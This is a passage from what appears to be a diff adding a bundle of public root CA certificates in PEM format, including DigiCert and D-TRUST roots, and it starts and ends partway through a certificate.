+RSAPWXYQ1qAk8C3eNvJsKTmjQjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/ +BAQDAgGGMB0GA1UdDgQWBBTL0L2p4ZgFUaFNN6KDec6NHSrkhDAKBggqhkjOPQQD +AwNnADBkAjAlpIFFAmsSS3V0T8gj43DydXLefInwz5FyYZ5eEJJZVrmDxxDnOOlY +JjZ91eQ0hjkCMHw2U/Aw5WJjOpnitqM7mzT6HtoQknFekROn3aRukswy1vUhZscv +6pZjamVFkpUBtA== +-----END CERTIFICATE----- + +# DigiCert Global Root CA +-----BEGIN CERTIFICATE----- +MIIDrzCCApegAwIBAgIQCDvgVpBCRrGhdWrJWZHHSjANBgkqhkiG9w0BAQUFADBh +MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 +d3cuZGlnaWNlcnQuY29tMSAwHgYDVQQDExdEaWdpQ2VydCBHbG9iYWwgUm9vdCBD +QTAeFw0wNjExMTAwMDAwMDBaFw0zMTExMTAwMDAwMDBaMGExCzAJBgNVBAYTAlVT +MRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5j +b20xIDAeBgNVBAMTF0RpZ2lDZXJ0IEdsb2JhbCBSb290IENBMIIBIjANBgkqhkiG +9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4jvhEXLeqKTTo1eqUKKPC3eQyaKl7hLOllsB +CSDMAZOnTjC3U/dDxGkAV53ijSLdhwZAAIEJzs4bg7/fzTtxRuLWZscFs3YnFo97 +nh6Vfe63SKMI2tavegw5BmV/Sl0fvBf4q77uKNd0f3p4mVmFaG5cIzJLv07A6Fpt +43C/dxC//AH2hdmoRBBYMql1GNXRor5H4idq9Joz+EkIYIvUX7Q6hL+hqkpMfT7P +T19sdl6gSzeRntwi5m3OFBqOasv+zbMUZBfHWymeMr/y7vrTC0LUq7dBMtoM1O/4 +gdW7jVg/tRvoSSiicNoxBN33shbyTApOB6jtSj1etX+jkMOvJwIDAQABo2MwYTAO +BgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUA95QNVbR +TLtm8KPiGxvDl7I90VUwHwYDVR0jBBgwFoAUA95QNVbRTLtm8KPiGxvDl7I90VUw +DQYJKoZIhvcNAQEFBQADggEBAMucN6pIExIK+t1EnE9SsPTfrgT1eXkIoyQY/Esr +hMAtudXH/vTBH1jLuG2cenTnmCmrEbXjcKChzUyImZOMkXDiqw8cvpOp/2PV5Adg +06O/nVsJ8dWO41P0jmP6P6fbtGbfYmbW0W5BjfIttep3Sp+dWOIrWcBAI+0tKIJF +PnlUkiaY4IBIqDfv8NZ5YBberOgOzW6sRBc4L0na4UU+Krk2U886UAb3LujEV0ls +YSEY1QSteDwsOoBrp+uvFRTp2InBuThs4pFsiv9kuXclVzDAGySj4dzp30d8tbQk +CAUw7C29C79Fv1C5qfPrmAESrciIxpg0X40KPMbp1ZWVbd4= +-----END CERTIFICATE----- + +# DigiCert Global Root G2 +-----BEGIN CERTIFICATE----- +MIIDjjCCAnagAwIBAgIQAzrx5qcRqaC7KGSxHQn65TANBgkqhkiG9w0BAQsFADBh +MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 +d3cuZGlnaWNlcnQuY29tMSAwHgYDVQQDExdEaWdpQ2VydCBHbG9iYWwgUm9vdCBH +MjAeFw0xMzA4MDExMjAwMDBaFw0zODAxMTUxMjAwMDBaMGExCzAJBgNVBAYTAlVT +MRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5j +b20xIDAeBgNVBAMTF0RpZ2lDZXJ0IEdsb2JhbCBSb290IEcyMIIBIjANBgkqhkiG +9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuzfNNNx7a8myaJCtSnX/RrohCgiN9RlUyfuI +2/Ou8jqJkTx65qsGGmvPrC3oXgkkRLpimn7Wo6h+4FR1IAWsULecYxpsMNzaHxmx +1x7e/dfgy5SDN67sH0NO3Xss0r0upS/kqbitOtSZpLYl6ZtrAGCSYP9PIUkY92eQ +q2EGnI/yuum06ZIya7XzV+hdG82MHauVBJVJ8zUtluNJbd134/tJS7SsVQepj5Wz +tCO7TG1F8PapspUwtP1MVYwnSlcUfIKdzXOS0xZKBgyMUNGPHgm+F6HmIcr9g+UQ +vIOlCsRnKPZzFBQ9RnbDhxSJITRNrw9FDKZJobq7nMWxM4MphQIDAQABo0IwQDAP +BgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBhjAdBgNVHQ4EFgQUTiJUIBiV +5uNu5g/6+rkS7QYXjzkwDQYJKoZIhvcNAQELBQADggEBAGBnKJRvDkhj6zHd6mcY +1Yl9PMWLSn/pvtsrF9+wX3N3KjITOYFnQoQj8kVnNeyIv/iPsGEMNKSuIEyExtv4 +NeF22d+mQrvHRAiGfzZ0JFrabA0UWTW98kndth/Jsw1HKj2ZL7tcu7XUIOGZX1NG +Fdtom/DzMNU+MeKNhJ7jitralj41E6Vf8PlwUHBHQRFXGU7Aj64GxJUTFy8bJZ91 +8rGOmaFvE7FBcf6IKshPECBV1/MUReXgRPTqh5Uykw7+U0b6LJ3/iyK5S9kJRaTe +pLiaWN0bfVKfjllDiIGknibVb63dDcY3fe0Dkhvld1927jyNxF1WW6LZZm6zNTfl +MrY= +-----END CERTIFICATE----- + +# DigiCert Global Root G3 +-----BEGIN CERTIFICATE----- +MIICPzCCAcWgAwIBAgIQBVVWvPJepDU1w6QP1atFcjAKBggqhkjOPQQDAzBhMQsw +CQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cu +ZGlnaWNlcnQuY29tMSAwHgYDVQQDExdEaWdpQ2VydCBHbG9iYWwgUm9vdCBHMzAe +Fw0xMzA4MDExMjAwMDBaFw0zODAxMTUxMjAwMDBaMGExCzAJBgNVBAYTAlVTMRUw +EwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20x +IDAeBgNVBAMTF0RpZ2lDZXJ0IEdsb2JhbCBSb290IEczMHYwEAYHKoZIzj0CAQYF +K4EEACIDYgAE3afZu4q4C/sLfyHS8L6+c/MzXRq8NOrexpu80JX28MzQC7phW1FG +fp4tn+6OYwwX7Adw9c+ELkCDnOg/QW07rdOkFFk2eJ0DQ+4QE2xy3q6Ip6FrtUPO +Z9wj/wMco+I+o0IwQDAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBhjAd +BgNVHQ4EFgQUs9tIpPmhxdiuNkHMEWNpYim8S8YwCgYIKoZIzj0EAwMDaAAwZQIx +AK288mw/EkrRLTnDCgmXc/SINoyIJ7vmiI1Qhadj+Z4y3maTD/HMsQmP3Wyr+mt/ +oAIwOWZbwmSNuJ5Q3KjVSaLtx9zRSX8XAbjIho9OjIgrqJqpisXRAL34VOKa5Vt8 +sycX +-----END CERTIFICATE----- + +# DigiCert High Assurance EV Root CA +-----BEGIN CERTIFICATE----- +MIIDxTCCAq2gAwIBAgIQAqxcJmoLQJuPC3nyrkYldzANBgkqhkiG9w0BAQUFADBs +MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 +d3cuZGlnaWNlcnQuY29tMSswKQYDVQQDEyJEaWdpQ2VydCBIaWdoIEFzc3VyYW5j +ZSBFViBSb290IENBMB4XDTA2MTExMDAwMDAwMFoXDTMxMTExMDAwMDAwMFowbDEL +MAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcGA1UECxMQd3d3 +LmRpZ2ljZXJ0LmNvbTErMCkGA1UEAxMiRGlnaUNlcnQgSGlnaCBBc3N1cmFuY2Ug +RVYgUm9vdCBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMbM5XPm ++9S75S0tMqbf5YE/yc0lSbZxKsPVlDRnogocsF9ppkCxxLeyj9CYpKlBWTrT3JTW +PNt0OKRKzE0lgvdKpVMSOO7zSW1xkX5jtqumX8OkhPhPYlG++MXs2ziS4wblCJEM +xChBVfvLWokVfnHoNb9Ncgk9vjo4UFt3MRuNs8ckRZqnrG0AFFoEt7oT61EKmEFB +Ik5lYYeBQVCmeVyJ3hlKV9Uu5l0cUyx+mM0aBhakaHPQNAQTXKFx01p8VdteZOE3 +hzBWBOURtCmAEvF5OYiiAhF8J2a3iLd48soKqDirCmTCv2ZdlYTBoSUeh10aUAsg +EsxBu24LUTi4S8sCAwEAAaNjMGEwDgYDVR0PAQH/BAQDAgGGMA8GA1UdEwEB/wQF +MAMBAf8wHQYDVR0OBBYEFLE+w2kD+L9HAdSYJhoIAu9jZCvDMB8GA1UdIwQYMBaA +FLE+w2kD+L9HAdSYJhoIAu9jZCvDMA0GCSqGSIb3DQEBBQUAA4IBAQAcGgaX3Nec +nzyIZgYIVyHbIUf4KmeqvxgydkAQV8GK83rZEWWONfqe/EW1ntlMMUu4kehDLI6z +eM7b41N5cdblIZQB2lWHmiRk9opmzN6cN82oNLFpmyPInngiK3BD41VHMWEZ71jF +hS9OMPagMRYjyOfiZRYzy78aG6A9+MpeizGLYAiJLQwGXFK3xPkKmNEVX58Svnw2 +Yzi9RKR/5CYrCsSXaQ3pjOLAEFe4yHYSkVXySGnYvCoCWw9E1CAx2/S6cCZdkGCe +vEsXCS+0yx5DaMkHJ8HSXPfqIbloEpw8nL+e/IBcm2PN7EeqJSdnoDfzAIJ9VNep ++OkuE6N36B9K +-----END CERTIFICATE----- + +# DigiCert TLS ECC P384 Root G5 +-----BEGIN CERTIFICATE----- +MIICGTCCAZ+gAwIBAgIQCeCTZaz32ci5PhwLBCou8zAKBggqhkjOPQQDAzBOMQsw +CQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xJjAkBgNVBAMTHURp +Z2lDZXJ0IFRMUyBFQ0MgUDM4NCBSb290IEc1MB4XDTIxMDExNTAwMDAwMFoXDTQ2 +MDExNDIzNTk1OVowTjELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDkRpZ2lDZXJ0LCBJ +bmMuMSYwJAYDVQQDEx1EaWdpQ2VydCBUTFMgRUNDIFAzODQgUm9vdCBHNTB2MBAG +ByqGSM49AgEGBSuBBAAiA2IABMFEoc8Rl1Ca3iOCNQfN0MsYndLxf3c1TzvdlHJS +7cI7+Oz6e2tYIOyZrsn8aLN1udsJ7MgT9U7GCh1mMEy7H0cKPGEQQil8pQgO4CLp +0zVozptjn4S1mU1YoI71VOeVyaNCMEAwHQYDVR0OBBYEFMFRRVBZqz7nLFr6ICIS +B4CIfBFqMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MAoGCCqGSM49 +BAMDA2gAMGUCMQCJao1H5+z8blUD2WdsJk6Dxv3J+ysTvLd6jLRl0mlpYxNjOyZQ +LgGheQaRnUi/wr4CMEfDFXuxoJGZSZOoPHzoRgaLLPIxAJSdYsiJvRmEFOml+wG4 +DXZDjC5Ty3zfDBeWUA== +-----END CERTIFICATE----- + +# DigiCert TLS RSA4096 Root G5 +-----BEGIN CERTIFICATE----- +MIIFZjCCA06gAwIBAgIQCPm0eKj6ftpqMzeJ3nzPijANBgkqhkiG9w0BAQwFADBN +MQswCQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xJTAjBgNVBAMT +HERpZ2lDZXJ0IFRMUyBSU0E0MDk2IFJvb3QgRzUwHhcNMjEwMTE1MDAwMDAwWhcN +NDYwMTE0MjM1OTU5WjBNMQswCQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQs +IEluYy4xJTAjBgNVBAMTHERpZ2lDZXJ0IFRMUyBSU0E0MDk2IFJvb3QgRzUwggIi +MA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCz0PTJeRGd/fxmgefM1eS87IE+ +ajWOLrfn3q/5B03PMJ3qCQuZvWxX2hhKuHisOjmopkisLnLlvevxGs3npAOpPxG0 +2C+JFvuUAT27L/gTBaF4HI4o4EXgg/RZG5Wzrn4DReW+wkL+7vI8toUTmDKdFqgp +wgscONyfMXdcvyej/Cestyu9dJsXLfKB2l2w4SMXPohKEiPQ6s+d3gMXsUJKoBZM +pG2T6T867jp8nVid9E6P/DsjyG244gXazOvswzH016cpVIDPRFtMbzCe88zdH5RD +nU1/cHAN1DrRN/BsnZvAFJNY781BOHW8EwOVfH/jXOnVDdXifBBiqmvwPXbzP6Po +sMH976pXTayGpxi0KcEsDr9kvimM2AItzVwv8n/vFfQMFawKsPHTDU9qTXeXAaDx +Zre3zu/O7Oyldcqs4+Fj97ihBMi8ez9dLRYiVu1ISf6nL3kwJZu6ay0/nTvEF+cd +Lvvyz6b84xQslpghjLSR6Rlgg/IwKwZzUNWYOwbpx4oMYIwo+FKbbuH2TbsGJJvX +KyY//SovcfXWJL5/MZ4PbeiPT02jP/816t9JXkGPhvnxd3lLG7SjXi/7RgLQZhNe +XoVPzthwiHvOAbWWl9fNff2C+MIkwcoBOU+NosEUQB+cZtUMCUbW8tDRSHZWOkPL +tgoRObqME2wGtZ7P6wIDAQABo0IwQDAdBgNVHQ4EFgQUUTMc7TZArxfTJc1paPKv +TiM+s0EwDgYDVR0PAQH/BAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcN +AQEMBQADggIBAGCmr1tfV9qJ20tQqcQjNSH/0GEwhJG3PxDPJY7Jv0Y02cEhJhxw +GXIeo8mH/qlDZJY6yFMECrZBu8RHANmfGBg7sg7zNOok992vIGCukihfNudd5N7H +PNtQOa27PShNlnx2xlv0wdsUpasZYgcYQF+Xkdycx6u1UQ3maVNVzDl92sURVXLF +O4uJ+DQtpBflF+aZfTCIITfNMBc9uPK8qHWgQ9w+iUuQrm0D4ByjoJYJu32jtyoQ +REtGBzRj7TG5BO6jm5qu5jF49OokYTurWGT/u4cnYiWB39yhL/btp/96j1EuMPik +AdKFOV8BmZZvWltwGUb+hmA+rYAQCd05JS9Yf7vSdPD3Rh9GOUrYU9DzLjtxpdRv +/PNn5AeP3SYZ4Y1b+qOTEZvpyDrDVWiakuFSdjjo4bq9+0/V77PnSIMx8IIh47a+ +p6tv75/fTM8BuGJqIz3nCU2AG3swpMPdB380vqQmsvZB6Akd4yCYqjdP//fx4ilw +MUc/dNAUFvohigLVigmUdy7yWSiLfFCSCmZ4OIN1xLVaqBHG5cGdZlXPU8Sv13WF +qUITVuwhd4GTWgzqltlJyqEI8pc7bZsEGCREjnwB8twl2F6GmrE52/WRMmrRpnCK +ovfepEWFJqgejF0pW8hL2JpqA15w8oVPbEtoL8pU9ozaMv7Da4M/OMZ+ +-----END CERTIFICATE----- + +# DigiCert Trusted Root G4 +-----BEGIN CERTIFICATE----- +MIIFkDCCA3igAwIBAgIQBZsbV56OITLiOQe9p3d1XDANBgkqhkiG9w0BAQwFADBi +MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 +d3cuZGlnaWNlcnQuY29tMSEwHwYDVQQDExhEaWdpQ2VydCBUcnVzdGVkIFJvb3Qg +RzQwHhcNMTMwODAxMTIwMDAwWhcNMzgwMTE1MTIwMDAwWjBiMQswCQYDVQQGEwJV +UzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNlcnQu +Y29tMSEwHwYDVQQDExhEaWdpQ2VydCBUcnVzdGVkIFJvb3QgRzQwggIiMA0GCSqG +SIb3DQEBAQUAA4ICDwAwggIKAoICAQC/5pBzaN675F1KPDAiMGkz7MKnJS7JIT3y +ithZwuEppz1Yq3aaza57G4QNxDAf8xukOBbrVsaXbR2rsnnyyhHS5F/WBTxSD1If +xp4VpX6+n6lXFllVcq9ok3DCsrp1mWpzMpTREEQQLt+C8weE5nQ7bXHiLQwb7iDV +ySAdYyktzuxeTsiT+CFhmzTrBcZe7FsavOvJz82sNEBfsXpm7nfISKhmV1efVFiO +DCu3T6cw2Vbuyntd463JT17lNecxy9qTXtyOj4DatpGYQJB5w3jHtrHEtWoYOAMQ +jdjUN6QuBX2I9YI+EJFwq1WCQTLX2wRzKm6RAXwhTNS8rhsDdV14Ztk6MUSaM0C/ +CNdaSaTC5qmgZ92kJ7yhTzm1EVgX9yRcRo9k98FpiHaYdj1ZXUJ2h4mXaXpI8OCi +EhtmmnTK3kse5w5jrubU75KSOp493ADkRSWJtppEGSt+wJS00mFt6zPZxd9LBADM +fRyVw4/3IbKyEbe7f/LVjHAsQWCqsWMYRJUadmJ+9oCw++hkpjPRiQfhvbfmQ6QY +uKZ3AeEPlAwhHbJUKSWJbOUOUlFHdL4mrLZBdd56rF+NP8m800ERElvlEFDrMcXK +chYiCd98THU/Y+whX8QgUWtvsauGi0/C1kVfnSD8oR7FwI+isX4KJpn15GkvmB0t +9dmpsh3lGwIDAQABo0IwQDAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIB +hjAdBgNVHQ4EFgQU7NfjgtJxXWRM3y5nP+e6mK4cD08wDQYJKoZIhvcNAQEMBQAD +ggIBALth2X2pbL4XxJEbw6GiAI3jZGgPVs93rnD5/ZpKmbnJeFwMDF/k5hQpVgs2 +SV1EY+CtnJYYZhsjDT156W1r1lT40jzBQ0CuHVD1UvyQO7uYmWlrx8GnqGikJ9yd ++SeuMIW59mdNOj6PWTkiU0TryF0Dyu1Qen1iIQqAyHNm0aAFYF/opbSnr6j3bTWc +fFqK1qI4mfN4i/RN0iAL3gTujJtHgXINwBQy7zBZLq7gcfJW5GqXb5JQbZaNaHqa +sjYUegbyJLkJEVDXCLG4iXqEI2FCKeWjzaIgQdfRnGTZ6iahixTXTBmyUEFxPT9N +cCOGDErcgdLMMpSEDQgJlxxPwO5rIHQw0uA5NBCFIRUBCOhVMt5xSdkoF1BN5r5N +0XWs0Mr7QbhDparTwwVETyw2m+L64kW4I1NsBm9nVX9GtUw/bihaeSbSpKhil9Ie +4u1Ki7wb/UdKDd9nZn6yW0HQO+T0O/QEY+nvwlQAUaCKKsnOeMzV6ocEGLPOr0mI +r/OSmbaz5mEP0oUA51Aa5BuVnRmhuZyxm7EAHu/QD09CbMkKvO5D+jpxpchNJqU1 +/YldvIViHTLSoCtU7ZpXwdv6EM8Zt4tKG48BtieVU+i2iW1bvGjUI+iLUaJW+fCm +gKDWHrO8Dw9TdSmq6hN35N6MgSGtBxBHEa2HPQfRdbzP82Z+ +-----END CERTIFICATE----- + +# D-TRUST BR Root CA 1 2020 +-----BEGIN CERTIFICATE----- +MIIC2zCCAmCgAwIBAgIQfMmPK4TX3+oPyWWa00tNljAKBggqhkjOPQQDAzBIMQsw +CQYDVQQGEwJERTEVMBMGA1UEChMMRC1UcnVzdCBHbWJIMSIwIAYDVQQDExlELVRS +VVNUIEJSIFJvb3QgQ0EgMSAyMDIwMB4XDTIwMDIxMTA5NDUwMFoXDTM1MDIxMTA5 +NDQ1OVowSDELMAkGA1UEBhMCREUxFTATBgNVBAoTDEQtVHJ1c3QgR21iSDEiMCAG +A1UEAxMZRC1UUlVTVCBCUiBSb290IENBIDEgMjAyMDB2MBAGByqGSM49AgEGBSuB +BAAiA2IABMbLxyjR+4T1mu9CFCDhQ2tuda38KwOE1HaTJddZO0Flax7mNCq7dPYS +zuht56vkPE4/RAiLzRZxy7+SmfSk1zxQVFKQhYN4lGdnoxwJGT11NIXe7WB9xwy0 +QVK5buXuQqOCAQ0wggEJMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFHOREKv/ +VbNafAkl1bK6CKBrqx9tMA4GA1UdDwEB/wQEAwIBBjCBxgYDVR0fBIG+MIG7MD6g +PKA6hjhodHRwOi8vY3JsLmQtdHJ1c3QubmV0L2NybC9kLXRydXN0X2JyX3Jvb3Rf +Y2FfMV8yMDIwLmNybDB5oHegdYZzbGRhcDovL2RpcmVjdG9yeS5kLXRydXN0Lm5l +dC9DTj1ELVRSVVNUJTIwQlIlMjBSb290JTIwQ0ElMjAxJTIwMjAyMCxPPUQtVHJ1 +c3QlMjBHbWJILEM9REU/Y2VydGlmaWNhdGVyZXZvY2F0aW9ubGlzdDAKBggqhkjO +PQQDAwNpADBmAjEAlJAtE/rhY/hhY+ithXhUkZy4kzg+GkHaQBZTQgjKL47xPoFW +wKrY7RjEsK70PvomAjEA8yjixtsrmfu3Ubgko6SUeho/5jbiA1czijDLgsfWFBHV +dWNbFJWcHwHP2NVypw87 +-----END CERTIFICATE----- + +# D-TRUST BR Root CA 2 2023 +-----BEGIN CERTIFICATE----- +MIIFqTCCA5GgAwIBAgIQczswBEhb2U14LnNLyaHcZjANBgkqhkiG9w0BAQ0FADBI +MQswCQYDVQQGEwJERTEVMBMGA1UEChMMRC1UcnVzdCBHbWJIMSIwIAYDVQQDExlE +LVRSVVNUIEJSIFJvb3QgQ0EgMiAyMDIzMB4XDTIzMDUwOTA4NTYzMVoXDTM4MDUw +OTA4NTYzMFowSDELMAkGA1UEBhMCREUxFTATBgNVBAoTDEQtVHJ1c3QgR21iSDEi +MCAGA1UEAxMZRC1UUlVTVCBCUiBSb290IENBIDIgMjAyMzCCAiIwDQYJKoZIhvcN +AQEBBQADggIPADCCAgoCggIBAK7/CVmRgApKaOYkP7in5Mg6CjoWzckjYaCTcfKr +i3OPoGdlYNJUa2NRb0kz4HIHE304zQaSBylSa053bATTlfrdTIzZXcFhfUvnKLNE +gXtRr90zsWh81k5M/itoucpmacTsXld/9w3HnDY25QdgrMBM6ghs7wZ8T1soegj8 +k12b9py0i4a6Ibn08OhZWiihNIQaJZG2tY/vsvmA+vk9PBFy2OMvhnbFeSzBqZCT +Rphny4NqoFAjpzv2gTng7fC5v2Xx2Mt6++9zA84A9H3X4F07ZrjcjrqDy4d2A/wl +2ecjbwb9Z/Pg/4S8R7+1FhhGaRTMBffb00msa8yr5LULQyReS2tNZ9/WtT5PeB+U +cSTq3nD88ZP+npNa5JRal1QMNXtfbO4AHyTsA7oC9Xb0n9Sa7YUsOCIvx9gvdhFP +/Wxc6PWOJ4d/GUohR5AdeY0cW/jPSoXk7bNbjb7EZChdQcRurDhaTyN0dKkSw/bS +uREVMweR2Ds3OmMwBtHFIjYoYiMQ4EbMl6zWK11kJNXuHA7e+whadSr2Y23OC0K+ +0bpwHJwh5Q8xaRfX/Aq03u2AnMuStIv13lmiWAmlY0cL4UEyNEHZmrHZqLAbWt4N +DfTisl01gLmB1IRpkQLLddCNxbU9CZEJjxShFHR5PtbJFR2kWVki3PaKRT08EtY+ +XTIvAgMBAAGjgY4wgYswDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUZ5Dw1t61 +GNVGKX5cq/ieCLxklRAwDgYDVR0PAQH/BAQDAgEGMEkGA1UdHwRCMEAwPqA8oDqG +OGh0dHA6Ly9jcmwuZC10cnVzdC5uZXQvY3JsL2QtdHJ1c3RfYnJfcm9vdF9jYV8y +XzIwMjMuY3JsMA0GCSqGSIb3DQEBDQUAA4ICAQA097N3U9swFrktpSHxQCF16+tI +FoE9c+CeJyrrd6kTpGoKWloUMz1oH4Guaf2Mn2VsNELZLdB/eBaxOqwjMa1ef67n +riv6uvw8l5VAk1/DLQOj7aRvU9f6QA4w9QAgLABMjDu0ox+2v5Eyq6+SmNMW5tTR +VFxDWy6u71cqqLRvpO8NVhTaIasgdp4D/Ca4nj8+AybmTNudX0KEPUUDAxxZiMrc +LmEkWqTqJwtzEr5SswrPMhfiHocaFpVIbVrg0M8JkiZmkdijYQ6qgYF/6FKC0ULn +4B0Y+qSFNueG4A3rvNTJ1jxD8V1Jbn6Bm2m1iWKPiFLY1/4nwSPFyysCu7Ff/vtD +hQNGvl3GyiEm/9cCnnRK3PgTFbGBVzbLZVzRHTF36SXDw7IyN9XxmAnkbWOACKsG +koHU6XCPpz+y7YaMgmo1yEJagtFSGkUPFaUA8JR7ZSdXOUPPfH/mvTWze/EZTN46 +ls/pdu4D58JDUjxqgejBWoC9EV2Ta/vH5mQ/u2kc6d0li690yVRAysuTEwrt+2aS +Ecr1wPrYg1UDfNPFIkZ1cGt5SAYqgpq/5usWDiJFAbzdNpQ0qTUmiteXue4Icr80 +knCDgKs4qllo3UCkGJCy89UDyibK79XH4I9TjvAA46jtn/mtd+ArY0+ew+43u3gJ +hJ65bvspmZDogNOfJA== +-----END CERTIFICATE----- + +# D-TRUST EV Root CA 1 2020 +-----BEGIN CERTIFICATE----- +MIIC2zCCAmCgAwIBAgIQXwJB13qHfEwDo6yWjfv/0DAKBggqhkjOPQQDAzBIMQsw +CQYDVQQGEwJERTEVMBMGA1UEChMMRC1UcnVzdCBHbWJIMSIwIAYDVQQDExlELVRS +VVNUIEVWIFJvb3QgQ0EgMSAyMDIwMB4XDTIwMDIxMTEwMDAwMFoXDTM1MDIxMTA5 +NTk1OVowSDELMAkGA1UEBhMCREUxFTATBgNVBAoTDEQtVHJ1c3QgR21iSDEiMCAG +A1UEAxMZRC1UUlVTVCBFViBSb290IENBIDEgMjAyMDB2MBAGByqGSM49AgEGBSuB +BAAiA2IABPEL3YZDIBnfl4XoIkqbz52Yv7QFJsnL46bSj8WeeHsxiamJrSc8ZRCC +/N/DnU7wMyPE0jL1HLDfMxddxfCxivnvubcUyilKwg+pf3VlSSowZ/Rk99Yad9rD +wpdhQntJraOCAQ0wggEJMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFH8QARY3 +OqQo5FD4pPfsazK2/umLMA4GA1UdDwEB/wQEAwIBBjCBxgYDVR0fBIG+MIG7MD6g +PKA6hjhodHRwOi8vY3JsLmQtdHJ1c3QubmV0L2NybC9kLXRydXN0X2V2X3Jvb3Rf +Y2FfMV8yMDIwLmNybDB5oHegdYZzbGRhcDovL2RpcmVjdG9yeS5kLXRydXN0Lm5l +dC9DTj1ELVRSVVNUJTIwRVYlMjBSb290JTIwQ0ElMjAxJTIwMjAyMCxPPUQtVHJ1 +c3QlMjBHbWJILEM9REU/Y2VydGlmaWNhdGVyZXZvY2F0aW9ubGlzdDAKBggqhkjO +PQQDAwNpADBmAjEAyjzGKnXCXnViOTYAYFqLwZOZzNnbQTs7h5kXO9XMT8oi96CA +y/m0sRtW9XLS/BnRAjEAkfcwkz8QRitxpNA7RJvAKQIFskF3UfN5Wp6OFKBOQtJb +gfM0agPnIjhQW+0ZT0MW +-----END CERTIFICATE----- + +# D-TRUST EV Root CA 2 2023 +-----BEGIN CERTIFICATE----- +MIIFqTCCA5GgAwIBAgIQaSYJfoBLTKCnjHhiU19abzANBgkqhkiG9w0BAQ0FADBI +MQswCQYDVQQGEwJERTEVMBMGA1UEChMMRC1UcnVzdCBHbWJIMSIwIAYDVQQDExlE +LVRSVVNUIEVWIFJvb3QgQ0EgMiAyMDIzMB4XDTIzMDUwOTA5MTAzM1oXDTM4MDUw +OTA5MTAzMlowSDELMAkGA1UEBhMCREUxFTATBgNVBAoTDEQtVHJ1c3QgR21iSDEi +MCAGA1UEAxMZRC1UUlVTVCBFViBSb290IENBIDIgMjAyMzCCAiIwDQYJKoZIhvcN +AQEBBQADggIPADCCAgoCggIBANiOo4mAC7JXUtypU0w3uX9jFxPvp1sjW2l1sJkK +F8GLxNuo4MwxusLyzV3pt/gdr2rElYfXR8mV2IIEUD2BCP/kPbOx1sWy/YgJ25yE +7CUXFId/MHibaljJtnMoPDT3mfd/06b4HEV8rSyMlD/YZxBTfiLNTiVR8CUkNRFe +EMbsh2aJgWi6zCudR3Mfvc2RpHJqnKIbGKBv7FD0fUDCqDDPvXPIEysQEx6Lmqg6 +lHPTGGkKSv/BAQP/eX+1SH977ugpbzZMlWGG2Pmic4ruri+W7mjNPU0oQvlFKzIb +RlUWaqZLKfm7lVa/Rh3sHZMdwGWyH6FDrlaeoLGPaxK3YG14C8qKXO0elg6DpkiV +jTujIcSuWMYAsoS0I6SWhjW42J7YrDRJmGOVxcttSEfi8i4YHtAxq9107PncjLgc +jmgjutDzUNzPZY9zOjLHfP7KgiJPvo5iR2blzYfi6NUPGJ/lBHJLRjwQ8kTCZFZx +TnXonMkmdMV9WdEKWw9t/p51HBjGGjp82A0EzM23RWV6sY+4roRIPrN6TagD4uJ+ +ARZZaBhDM7DS3LAaQzXupdqpRlyuhoFBAUp0JuyfBr/CBTdkdXgpaP3F9ev+R/nk +hbDhezGdpn9yo7nELC7MmVcOIQxFAZRl62UJxmMiCzNJkkg8/M3OsD6Onov4/knF +NXJHAgMBAAGjgY4wgYswDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUqvyREBuH +kV8Wub9PS5FeAByxMoAwDgYDVR0PAQH/BAQDAgEGMEkGA1UdHwRCMEAwPqA8oDqG +OGh0dHA6Ly9jcmwuZC10cnVzdC5uZXQvY3JsL2QtdHJ1c3RfZXZfcm9vdF9jYV8y +XzIwMjMuY3JsMA0GCSqGSIb3DQEBDQUAA4ICAQCTy6UfmRHsmg1fLBWTxj++EI14 +QvBukEdHjqOSMo1wj/Zbjb6JzkcBahsgIIlbyIIQbODnmaprxiqgYzWRaoUlrRc4 +pZt+UPJ26oUFKidBK7GB0aL2QHWpDsvxVUjY7NHss+jOFKE17MJeNRqrphYBBo7q +3C+jisosketSjl8MmxfPy3MHGcRqwnNU73xDUmPBEcrCRbH0O1P1aa4846XerOhU +t7KR/aypH/KH5BfGSah82ApB9PI+53c0BFLd6IHyTS9URZ0V4U/M5d40VxDJI3IX 